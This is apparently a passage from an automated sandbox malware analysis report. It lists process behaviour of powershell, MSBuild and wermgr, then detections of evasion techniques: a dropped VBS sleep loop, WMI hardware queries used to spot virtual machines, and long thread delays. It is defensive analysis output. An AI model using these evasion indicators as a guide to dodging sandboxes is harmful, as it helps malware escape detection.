                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Potential evasive VBS script found (sleep loop)
                  Source: C:\Windows\System32\wscript.exeDropped file: Do While CompteurIterations < 10000 ' Limite d'iterations pour demonstration WScript.Sleep 10000Jump to dropped file
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6022Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3869Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2601Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 786Jump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 5096Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 2912Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 5096Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2444Thread sleep count: 2601 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -99890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2444Thread sleep count: 786 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -99780s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -99671s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -99562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -99452s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -99343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -99234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -99124s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -99015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -98906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -98796s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -98687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -98577s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -98468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -98359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -98250s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
